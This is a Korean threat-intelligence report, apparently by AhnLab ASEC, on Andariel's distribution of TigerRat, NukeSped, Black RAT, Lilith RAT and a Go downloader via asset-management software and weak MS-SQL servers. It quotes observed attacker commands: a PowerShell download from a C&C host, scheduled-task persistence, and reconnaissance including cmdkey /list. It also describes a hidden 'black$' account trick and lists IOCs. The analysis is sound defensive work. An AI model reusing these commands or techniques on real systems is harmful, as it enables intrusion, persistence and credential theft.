ASEC 분석팀은 Lazarus 그룹과 협력 관계이거나 하위 조직으로 알려진 Andariel 위협 그룹이 최근 특정 자산 관리 프로그램을 이용한 공격을 통해 악성코드를 유포하고 있는 정황을 확인하였다.
Andariel 그룹은 최초 침투 과정에서 주로 스피어 피싱 공격이나 워터링 홀 공격 그리고 공급망 공격을 이용하며, 이외에도 악성코드 설치 과정에서 중앙 관리 솔루션을 악용하는 사례도 존재한다. 최근에는 Log4Shell 및 Innorix Agent 등 여러 프로그램에 대한 취약점들을 이용하여 국내 다양한 기업군에 공격을 해오고 있다. [1]
이번에 확인된 공격은 국내의 또 다른 자산 관리 프로그램이 사용되었으며, 이외에도 MS-SQL 서버를 대상으로 한 공격도 동시에 확인되었다. 이러한 공격을 통해 설치된 악성코드들로는 TigerRat뿐만 아니라 NukeSped 변종, Black RAT, 오픈 소스 악성코드인 Lilith RAT 등 다양한 악성코드들이 존재한다. 공격 대상으로 확인된 국내 통신 업체, 반도체 제조업 등 기존 공격 대상 사례들과 유사하다.
1. 최초 침투 단계
최근 국내 특정 자산 관리 프로그램이 Andariel 그룹의 악성코드들을 설치한 로그가 자사 AhnLab Smart Defense (ASD) 로그에서 확인되었다. 물론 해당 로그만으로는 취약점을 이용한 공격인지 단순한 악용인지는 알 수 없다. 공격 대상 시스템에서 실행 중인 자산 관리 프로그램은 최종적으로 다음과 같은 파워쉘 명령을 이용해 악성코드를 다운로드하였다.
- 파워쉘 명령 : wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe
Andariel 그룹은 파워쉘 외에도 mshta.exe 프로세스를 이용해 악성코드를 다운로드하기도 하였다. 다음은 C&C 주소에 업로드된 HTML 악성코드로서 TigerRat과 같은 Andariel 그룹의 다른 악성코드들을 다운로드하는 기능을 담당한다.
이전 공격 사례에서 Andariel 그룹은 Innorix Agent 뿐만 아니라 스피어 피싱 공격을 함께 사용하였다. 이번 공격 사례에서 눈에 띄는 점은 MS-SQL 서버를 이용한 악성코드 설치 사례가 함께 존재한다는 점이다. 공격자는 부적절하게 관리되는 MS-SQL 서버를 공격해 NukeSped를 설치한 것으로 추정된다. Remcos RAT, Mallox 랜섬웨어 등의 악성코드들은 주로 무차별 대입 공격이나 사전 공격에 취약한 자격 증명 정보를 갖는 MS-SQL 서버를 대상으로 하는 공격을 통해 설치되는데, 해당 시스템에서는 과거에도 다른 공격자들이 이러한 악성코드를 설치하려고 시도했던 로그가 확인되기 때문이다. 즉 Andariel 그룹 또한 최근에는 부적절하게 관리되는 MS-SQL 서버를 공격 벡터로 활용하고 있는 것으로 보인다.
공격 과정에서는 일반적인 MS-SQL 서버 대상 공격 사례와 유사하게 권한 상승을 목적으로 PrintSpoofer 악성코드가 함께 사용되었다.
2. 공격에 사용된 악성코드
위의 공격을 통해 설치된 백도어 악성코드들로는 Andariel 그룹의 대표적인 악성코드들 중 하나인 TigerRat, Black RAT, NukeSped 변종들이 있다. 이러한 악성코드들은 기존 공격과 거의 유사하지만 이번 공격 사례에서는 오픈 소스 악성코드인 Lilith RAT이 사용된 것이 특징이다. 이외에도 최근 Go 언어로 개발된 악성코드들을 자주 사용하는 Andariel 그룹의 흐름과 유사하게 Go 언어로 개발된 다운로더 악성코드도 함께 확인된다.
2.1. TigerRat
국내 자산 관리 프로그램을 통해 설치된 악성코드는 TigerRat 이었다. Andariel 그룹은 과거 워터링 홀 공격부터 Log4Shell 취약점 공격 등 대부분의 국내 타켓 공격에서 TigerRat을 사용하고 있다. [2] TigerRat은 백도어 악성코드로서 파일 업로드 및 다운로드, 명령 실행, 기본 정보 수집, 키로깅, 스크린 캡쳐, 포트 포워딩 등 다양한 기능을 지원한다.
일반적인 백도어 악성코드들과의 차이점이라고 한다면 C&C 서버와의 최초 통신 과정에서 특정 문자열을 주고받아야 하는 인증 과정이 존재한다는 점이다. 이번 공격에 사용된 TigerRat 또한 2023년에 확인된 유형들과 동일하게 0x20 크기의 랜덤한 문자열들이 인증에 사용되었다. 해당 문자열들은 “fool”(dd7b696b96434d2bf07b34f9c125d51d), “iwan”(01ccce480c60fcdb67b54f4509ffdb56)에 대한 MD5 해시로 추정된다.
- C&C 요청 문자열 : dd7b696b96434d2bf07b34f9c125d51d
- C&C 응답 문자열 : 01ccce480c60fcdb67b54f4509ffdb56
2.2. Golang 다운로더
Andariel 그룹은 2023년 경부터 다양한 백도어 악성코드들을 Go 언어로 제작하여 사용하고 있다. 이전 사례에서는 Black RAT, Goat RAT, DurianBeacon 등이 사용되었으며 이번 공격 사례에서는 Go 언어로 개발된 다운로더 악성코드가 사용되었다. 해당 악성코드는 단순한 형태로서 C&C 서버에 접속하여 추가 페이로드를 설치한다. 특징이 있다면 C&C 서버와의 통신에 Base64 암호화를 사용한다는 점이 있다.
공격자는 국내 자산 관리 프로그램을 악용하여 직접 TigerRat을 설치하기도 했지만 Golang 다운로더를 설치한 이후 해당 악성코드가 추가 페이로드를 설치하는 방식도 사용하였다. Golang 다운로더를 통해 설치된 악성코드들로는 TigerRat과 NukeSped 변종 악성코드가 있다.
2.3. NukeSped 변종
NukeSped는 C&C 서버로부터 명령을 받아 감염 시스템을 제어할 수 있는 백도어 악성코드이다. 공격에 사용된 NukeSped 변종 중 첫 번째 유형은 최초 C&C 서버와의 통신 시 POST 메소드를 이용해 패킷을 전송하며 이후 C&C 서버로부터 전달받은 명령을 수행한 결과는 구글 접속을 위장한 GET 메소드를 이용해 전송하는 점이 특징이다.
공격 과정에서는 또 다른 NukeSped 변종도 확인된다. 비록 크기는 23KB로 작지만 자가 삭제에 사용되는 문자열은 기존 NukeSped 변종과 유사하다.
2.4. Black RAT
Black RAT은 Go 언어로 개발된 백도어 악성코드로서 2023년에 Andariel 그룹의 공격 사례에서 최초로 확인되었다. 이번 공격에 사용된 Black RAT은 소스 코드 정보는 포함되어 있지 않지만 함수 이름이 기존 Black RAT과 거의 유사한 것을 통해 구분이 가능하다.
2.5. Lilith RAT
Lilith RAT은 깃허브에 공개된 오픈 소스 RAT 악성코드이다. C++ 언어로 개발되었으며 원격 명령 실행, 지속성 유지, 자가 삭제 등 감염 시스템을 제어할 수 있는 다양한 기능들을 제공한다.
Andariel 그룹이 공격에 사용한 Lilith RAT은 바이너리에 존재하는 문자열들 중 상당수가 암호화되어 있는데 이는 파일 진단을 우회하기 위한 목적으로 추정된다. 하지만 모든 문자열들이 암호화된 것은 아니며 일부 문자열들은 Lilith RAT의 소스 코드와 동일하다.
2.6. 사용자 계정 추가
공격자는 백도어 악성코드들을 이용해 감염 시스템을 제어하는 것 외에도 감염 시스템에 사용자 계정을 추가하고 이를 은폐하였다. 이러한 작업은 직접 제작한 악성코드를 이용하였는데, 해당 악성코드는 감염 시스템에 특정 사용자 계정이 존재할 때만 정상적으로 동작하기 때문에 이는 이미 감염 시스템에 대한 제어가 탈취된 이후라는 것을 의미한다.
일반적으로 공격자가 백도어를 이용해 감염 시스템을 제어할 수 있음에도 불구하고 사용자 계정을 추가하는 이유는 이후 원격 데스크톱을 이용해 GUI 환경에서 감염 시스템을 제어하고 지속성을 유지하기 위한 목적이다. 하지만 단순하게 계정만 추가한다면 시스템의 사용자가 로그인하는 과정에서 새롭게 생성된 사용자 계정을 인지할 수 있다.
이러한 이유 때문에 악성코드는 사용자가 인지할 수 없도록 다음과 같은 과정을 진행한다. 먼저 계정 이름에 “$” 기호를 붙여 생성한 후 기존 사용자의 SAM 데이터 중 일부를 복사하여 생성한 “black$“ 계정에 덮어씌우는데 만약 기존 사용자가 관리자 계정이고 원격 데스크톱이 허용된 사용자라면 “black$” 계정 또한 이러한 특성을 동일하게 가질 수 있다.
참고로 Kimsuky 그룹에서 사용했던 악성코드들은 사용자 계정 추가 이후 관리자 그룹에 등록하고 SpecialAccounts에 추가하며 방화벽에서도 해당 계정을 활성화시켰다. [3] 이러한 과정은 보안 제품에 의해 쉽게 탐지 가능한데 Andariel 그룹은 위의 악성코드를 이용해 이러한 추가적인 작업 없이도 은폐된 계정을 추가하였다는 점이 특징이다.
3. 감염 이후
공격자는 백도어 악성코드를 설치한 이후 지속성 유지를 위해 다음과 같은 명령을 실행하여 작업 스케줄러에 등록하였다.
| > schtasks /delete /tn “microsoft\******” /f > schtasks /create /tn “microsoft\******” /tr “c:\users\%ASD%\credis.exe” /sc onlogon /ru system > schtasks /run /tn “microsoft\windows\mui\route” |
이후에는 다음 명령들을 이용해 감염 시스템에 대한 정보를 조회하였다.
| > cmd.exe /c “query user” > cmd.exe /c “ipconfig” > cmd.exe /c “whoami” > cmd.exe /c “cmdkey /list” > cmd.exe /c “netsat -nao | findstr 445” |
이외에도 다운로더 악성코드를 제거하거나 다른 프로세스를 종료하는 명령들도 확인된다.
| > cmd.exe /c “del /f c:\users\%ASD%\perf.exe” > taskkill /f /pid 15036 |
공격자는 백도어를 이용해 정보를 수집하기도 하지만 NirSoft 사의 CredentialsFileVIew, Network Password Recovery와 같은 HackTool들을 추가로 다운로드해 사용하기도 하였다. 해당 도구들은 감염 시스템에 저장된 자격 증명 정보와 공유 폴더에 대한 자격 증명 정보를 보여주는 도구로서 추후 감염 시스템이 존재하는 조직의 내부 네트워크 상에서 측면 이동을 위해 사용될 수 있다.
4. 결론
Andariel 그룹은 Kimsuky, Lazarus 그룹과 함께 국내를 대상으로 활발하게 활동하고 있는 위협 그룹들 중 하나이다. 초기에는 주로 안보와 관련된 정보를 획득하기 위해 공격을 전개하였지만 이후에는 금전적 이득을 목적으로 한 공격도 수행하고 있다. [4] 초기 침투 시 주로 스피어 피싱 공격이나 워터링 홀 공격 그리고 소프트웨어의 취약점을 이용하는 것으로 알려져 있으며 공격 과정에서 다른 취약점을 이용해 악성코드를 배포하는 정황도 확인되고 있다.
최근 확인된 공격 사례에서는 취약한 MY-SQL 서버에 대한 공격뿐만 아니라 자산 관리 프로그램 등 회사 내 여러 프로그램을 이용하여 공급망 공격을 수행하는 것으로 보인다. 사용자들은 출처가 불분명한 메일의 첨부 파일이나 웹 페이지에서 다운로드한 실행 파일은 각별히 주의해야 하며, 기업 보안 담당자는 자산 관리 프로그램의 모니터링을 강화하고 프로그램 보안 취약점이 있다면 패치를 수행하여야 한다. 그리고 OS 및 인터넷 브라우저 등의 프로그램들에 대한 최신 패치 및 V3를 최신 버전으로 업데이트하여 이러한 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다.
현재 V3에서는 아래와 같이 진단하고 있으며, IOC는 다음과 같다.
파일 진단
– Malware/Win.Generic.C5528992 (2023.10.25.00)
– Malware/Win.Generic.C5528516 (2023.10.26.00)
– Backdoor/Win.TigerRAT.C5517634 (2023.10.19.03)
– Backdoor/Win.Agent.C5518308 (2023.10.20.00)
– Downloader/HTML.Agent.SC193459 (2023.10.19.03)
– Downloader/HTML.Agent.SC193403 (2023.10.18.01)
– Backdoor/Win.TigerRAT.C5513095 (2023.10.17.03)
– Unwanted/Win.HackTool.C5175443 (2022.06.20.02)
– HackTool/Win.CredentialsFileView (2022.04.20.00)
– Backdoor/Win.Agent.R619279 (2023.11.01.01)
– Backdoor/Win.Agent.C5534745 (2023.11.01.01)
– Backdoor/Win.NukeSped.C5535346 (2023.11.01.03)
– Backdoor/Win.BlackRAT.C5535345 (2023.11.01.03)
– Exploit/Win.PrintSpoofer.C5535350 (2023.11.02.00)
행위 진단
– Malware/MDP.Download.M1197
IOC
MD5
– 13b4ce1fc26d400d34ede460a8530d93 : TigerRat (credisvs.exe, credis.exe)
– 41895c5416fdc82f7e0babc6bb6c7216 : TigerRat (credisvs.exe)
– c2f8c9bb7df688d0a7030a96314bb493 : TigerRat (crec.exe, dbinfo.exe)
– 33a3da2de78418b89a603e28a1e8852c : TigerRat (mltest.exe)
– 4896da30a745079cd6265b6332886d45 : Lilith RAT (svchost.exe, secure.exe, test.exe)
– 73eb2f4f101aab6158c615094f7a632a : NukeSped 변종 – Type 1 (system.exe, credisvc.exe)
– 7f33d2d2a2ce9c195202acb59de31eee : NukeSped 변종 – Type 1 (mshelp.exe)
– e1afd01400ef405e46091e8ef10c721c : NukeSped 변종 – Type 1 (msuser.exe)
– fe25c192875ec1914b8880ea3896cda2 : NukeSped 변종 – Type 1 (credisvc.exe)
– 232586f8cfe82b80fd0dfa6ed8795c56 : NukeSped 변종 – Type 2 (perf.exe)
– c1f266f7ec886278f030e7d7cd4e9131 : Black RAT (winsta.exe)
– 49bb2ad67a8c5dfbfe8db2169e6fa46e : Golang 다운로더 (perf.exe)
– beb199b15bd075996fa8d6a0ed554ca8 : Golang 다운로더 (credisvc.exe)
– 4053ca3e37ed1f8d37b29eed61c2e729 : 사용자 계정 추가 악성코드 (test.exe)
– 3a0c8ae783116c1840740417c4fbe678 : 사용자 계정 추가 악성코드 (test.exe)
– 0414a2ab718d44bf6f7103cff287b312 : PrintSpoofer (print.exe)
– ca564428a29faf1a613f35d9fa36313f : Network Password Recovery – NirSoft (net.exe)
– ad6d4eb34d29e350f96dc8df6d8a092e : CredentialsFileView – NirSoft (credentialsfileview.exe)
– dc70dc9845aa747001ebf2a02467c203 : 다운로드 스크립트
– 3d2ec58f37c8176e0dbcc47ff93e5a76 : 다운로드 스크립트
C&C 주소
– 27.102.115[.]207:8088 : Black RAT, NukeSped 변종 Type 2
– 27.102.118[.]204:8081 : Golang 다운로더
– 84.38.132[.]67:8443 : NukeSped 변종 Type 1, Lilith RAT
– 109.248.150[.]147:443 : TigerRat
– 109.248.150[.]147:8080 : TigerRat
– 109.248.150[.]147:8443 : TigerRat
– 185.29.8[.]108:443 : TigerRat
– 185.29.8[.]108:3443 : TigerRat
– 185.29.8[.]108:4443 : TigerRat
– 185.29.8[.]108:8080 : TigerRat
– 185.29.8[.]108:8081 : Golang 다운로더
– 185.29.8[.]108:8443 : TigerRat, NukeSped 변종 Type 1
다운로드 주소
– hxxp://27.102.128[.]152:8098/load.png : TigerRat
– hxxp://27.102.118[.]204:6099/fav.ico : Golang 다운로더
– hxxp://84.38.132[.]67:9479/fav.ico : User Adder, Lilith RAT
– hxxp://84.38.132[.]67:9479/netpass.png : Network Password Recovery – NirSoft
– hxxp://109.248.150[.]147:8585/load.png : TigerRat
– hxxp://109.248.150[.]147:8585/load.html : 다운로드 스크립트
– hxxp://109.248.150[.]147:8585/view.php : TigerRat
– hxxp://185.29.8[.]108:8585/load.html : 다운로드 스크립트
– hxxp://185.29.8[.]108:8585/view.php : TigerRat
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보